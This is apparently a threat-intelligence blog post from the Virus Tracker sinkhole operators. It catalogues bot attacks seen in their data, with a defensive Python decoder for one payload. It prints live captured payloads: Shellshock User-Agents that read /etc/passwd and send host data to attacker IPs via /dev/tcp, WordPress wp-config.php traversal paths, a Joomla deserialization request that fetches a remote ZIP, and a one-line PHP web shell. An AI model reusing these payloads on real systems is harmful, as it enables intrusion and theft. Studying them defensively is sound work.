Web attacks caught by Virus Tracker

Running the largest botnet monitoring system in the world (more than 8,000 sinkholed domains), we see all kinds of bots connecting to our sinkholes, including robots that scan for and try to exploit specific vulnerabilities such as Shellshock, weak admin panels, or SQL injection.

Finding exploit attempts in our dataset

Finding such entries is fairly easy: we download all APT infection data for this year and run a full-text search for anything containing "{" (the curly brace appears both in the Shellshock function-definition prefix and in the PHP eval payloads shown below).

Request paths containing the exploit:
/search/?query=${eval(base64_decode(%27ZWNobycycTRtbmozaGc2bW5nZmgnOw==%27));}

User-Agent strings carrying Shellshock payloads:
() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd;
() { test;};echo Content-type: text/plain; echo; echo; /bin/cat /etc/passwd
() { :;}; /bin/bash -c echo [domain]/cgi-bin/php5 > /dev/tcp/213.233.161.42/23; echo [domain]/cgi-bin/php5 > /dev/udp/213.233.161.42/80
() { :;}; /bin/bash -c echo [domain]/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo [domain]/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80
() { :;}; /bin/bash -c echo [domain]/cgi-bin/php-cgi > /dev/tcp/213.233.161.42/23; echo [domain]/cgi-bin/php-cgi > /dev/udp/213.233.161.42/80
() { :;}; /bin/bash -c echo [domain]/cgi-bin/php-cgi > /dev/tcp/213.233.161.42/23; echo [domain]/cgi-bin/php-cgi > /dev/udp/213.233.161.42/80
() { :;}; /bin/bash -c echo [domain]/ > /dev/tcp/213.233.161.42/23; echo [domain]/ > /dev/udp/213.233.161.42/80
() { :;}; /bin/bash -c echo [domain]/phppath/cgi_wrapper?  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo [domain]/phppath/cgi_wrapper? > /dev/udp/67.228.177.7/80

Look at the first one. Using the Virus Tracker tools to decode the base64 "ZWNobycycTRtbmozaGc2bW5nZmgnOw==" gives "echo'2q4mnj3hg6mngfh';". The tool sending this poisoned request presumably looks for the string "2q4mnj3hg6mngfh" in the response to verify whether the server is vulnerable.

In the other attempts you can see that the payload writes information (the probed URL and, in some variants, the output of uname -a) to remote hosts through bash's /dev/tcp and /dev/udp pseudo-devices. We have plenty of those user agents and pasted only a few above.

Where are those evil robots scanning for vulnerable servers coming from?

Because these requests arrive over a completed TCP connection, the source IP of each scanning robot cannot be spoofed, so we see where every robot connects from. For the base64 one from above we have seen the exact same requests coming from these locations:

Timestamp	IP	Network	Country
2015-01-13 22:58:28	62.212.76.84	LeaseWeb	Netherlands
2015-01-13 23:00:52	85.128.139.6	NetArt webhosting servers	Poland
2015-01-13 22:20:24	184.168.46.87	GoDaddy.com LLC	United States
2015-01-13 22:22:15	184.168.152.75	GoDaddy.com LLC	United States
2015-01-13 23:07:06	97.74.24.214	GoDaddy.com LLC	United States
2015-01-14 07:46:58	198.57.247.223	Unified Layer	United States
2015-01-13 23:02:27	31.41.43.1	Relink Ltd.	Russian Federation
2015-01-13 23:05:38	164.138.200.148	Centro Canario de Tratamiento de Informacion SLU	Spain

You can check it out yourself at http://virustracker.net/91.109.2.132; have a look at the user agents there!

And here is the list of the most recent attempts from today:

Timestamp	IP	Network	Country	Path	User-Agent
2015-03-05 20:12:52	74.208.199.94	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo IMGGOOGLE.COM/cgi-sys/php4  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo IMGGOOGLE.COM/cgi-sys/php4 > /dev/udp/67.228.177.7/80
2015-03-05 20:51:53	74.208.199.94	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo INDIA-VIDEOER.COM/cgi-sys/php4  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo INDIA-VIDEOER.COM/cgi-sys/php4 > /dev/udp/67.228.177.7/80
2015-03-05 21:24:08	74.208.199.94	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo INFO-WEEK.COM/cgi-sys/php4  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo INFO-WEEK.COM/cgi-sys/php4 > /dev/udp/67.228.177.7/80
2015-03-06 02:13:12	74.208.199.94	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo JASMINJORDEN.COM/cgi-sys/php4  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo JASMINJORDEN.COM/cgi-sys/php4 > /dev/udp/67.228.177.7/80

Robots scanning for vulnerable admin panels

Of course we also see plenty of attempts to find and exploit admin panels, like these (the WordPress ones use path traversal through plugin and theme scripts to read wp-config.php):

Timestamp	IP	Network	Country	Path
2015-03-05 23:43:23	78.151.25.8	TalkTalk	United Kingdom	/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
2015-03-05 23:43:25	185.11.227.211	Wave-Max S.r.l.	Italy	/wp-content/themes/infocus/lib/scripts/dl-skin.php
2015-03-05 23:43:36	135.196.125.106	MDNX Enterprise Services Limited	United Kingdom	/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php
2015-03-05 23:43:40	134.255.167.15	Wave-Max S.r.l.	Italy	/wp-content/themes/dejavu/lib/scripts/dl-skin.php
2015-03-06 00:25:36	194.6.233.15	SpecAvtomatika LTD	Ukraine	/administrator/index.php

It might be interesting, and possible, to mine the Virus Tracker dataset for publicly unknown vulnerabilities that are being actively exploited by criminals.

A particularly interesting one, which carries an additional encoded payload, is this:

/administrator/components/com_joomlaupdate/restore.php?task=stepRestore&factory=Tzo5OiJBS0ZhY3RvcnkiOjE6e3M6MTg6IgBBS0ZhY3RvcnkAdmFybGlzdCI7YToyOntzOjI3OiJraWNrc3RhcnQuc2VjdXJpdHkucGFzc3dvcmQiO3M6MDoiIjtzOjI2OiJraWNrc3RhcnQuc2V0dXAuc291cmNlZmlsZSI7czo0MDoiaHR0cDovL2RhbGUxdnVlbHRhLmNvbS9tZWRpYS93dDUxMjFuLnppcCI7fX0=

The decoded text (from base64) is a PHP serialized object:
O:9:"AKFactory":1:{s:18:"AKFactoryvarlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:40:"http://dale1vuelta.com/media/wt5121n.zip";}}

The property name is declared with length 18 although only 16 characters are visible: PHP frames private property names with NUL bytes ("\0AKFactory\0varlist"), which do not display here. The payload sets an empty kickstart.security.password and points kickstart.setup.sourcefile at an archive on a remote host, so the restore script is told to fetch and unpack an attacker-supplied ZIP.
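As an added example that is not part of the original post or of the Virus Tracker tooling: Python code that takes the request path quoted above, base64-decodes the factory parameter and walks the PHP serialized structure, honouring each declared string length so the NUL-framed private property name is read intact. It then reports whether the restore has been pointed at a remote archive with an empty password, which is the condition a defender would alert on. The function and key names are assumptions; the path and blob are the ones from the post.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# The request path quoted in the post; the factory= value is the base64 blob exactly as observed.
OBSERVED_PATH = (
    "/administrator/components/com_joomlaupdate/restore.php?task=stepRestore&factory="
    "Tzo5OiJBS0ZhY3RvcnkiOjE6e3M6MTg6IgBBS0ZhY3RvcnkAdmFybGlzdCI7YToyOntzOjI3OiJraWNrc3RhcnQuc2VjdXJp"
    "dHkucGFzc3dvcmQiO3M6MDoiIjtzOjI2OiJraWNrc3RhcnQuc2V0dXAuc291cmNlZmlsZSI7czo0MDoiaHR0cDovL2RhbGUx"
    "dnVlbHRhLmNvbS9tZWRpYS93dDUxMjFuLnppcCI7fX0="
)

STRING_RE = re.compile(rb's:(\d+):"')   # PHP serialized string: s:<len>:"<bytes>";
OBJECT_RE = re.compile(rb'O:(\d+):"')   # PHP serialized object: O:<len>:"<class>":<n>:{...}


def php_strings(blob):
    """Collect every s:N:"..." value from a PHP-serialized byte string, in order.
    The declared length N is honoured, so values containing quotes, semicolons or NUL bytes
    (PHP frames private property names as "\\0Class\\0name") are read intact."""
    values, pos = [], 0
    while True:
        m = STRING_RE.search(blob, pos)
        if m is None:
            return values
        n, start = int(m.group(1)), m.end()
        if blob[start + n:start + n + 2] != b'";':
            raise ValueError("declared length %d does not match data at offset %d" % (n, m.start()))
        values.append(blob[start:start + n].decode("latin-1"))
        pos = start + n + 2


def parse_factory(blob):
    """Pull the class name, the private property name and the key/value varlist out of the payload."""
    m = OBJECT_RE.match(blob)
    cls = blob[m.end():m.end() + int(m.group(1))].decode("latin-1") if m else None
    strings = php_strings(blob)
    # first string is the property name ("\0AKFactory\0varlist"); the rest alternate key, value
    prop = strings[0].split("\0")[-1] if strings else None
    varlist = dict(zip(strings[1::2], strings[2::2]))
    source = varlist.get("kickstart.setup.sourcefile", "")
    return {
        "class": cls,
        "property": prop,
        "varlist": varlist,
        # a restore told to fetch its archive from another host is the red flag here
        "remote_source": urlsplit(source).scheme in ("http", "https", "ftp"),
        "empty_password": varlist.get("kickstart.security.password") == "",
    }


def inspect_request(path):
    """Decode the factory= parameter of a restore.php request; None when the parameter is absent."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    factory = qs.get("factory", [None])[0]
    if factory is None:
        return None
    # parse_qs turns '+' into a space; put it back before base64-decoding
    blob = base64.b64decode(factory.replace(" ", "+"), validate=True)
    return parse_factory(blob)


if __name__ == "__main__":
    print(inspect_request(OBSERVED_PATH))
```

Reading by declared length rather than splitting on quotes is what makes the parser robust: a value could legitimately contain `";` and a regex split would then misalign every following key and value.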

The zip file is still up and contains a PHP file consisting of only this line (chr(112).chr(49) spells the parameter name "p1", so this is a one-line web shell that evaluates whatever is POSTed in that parameter):
< ? php eval(stripslashes(@$_POST[(chr(112).chr(49))])); ? >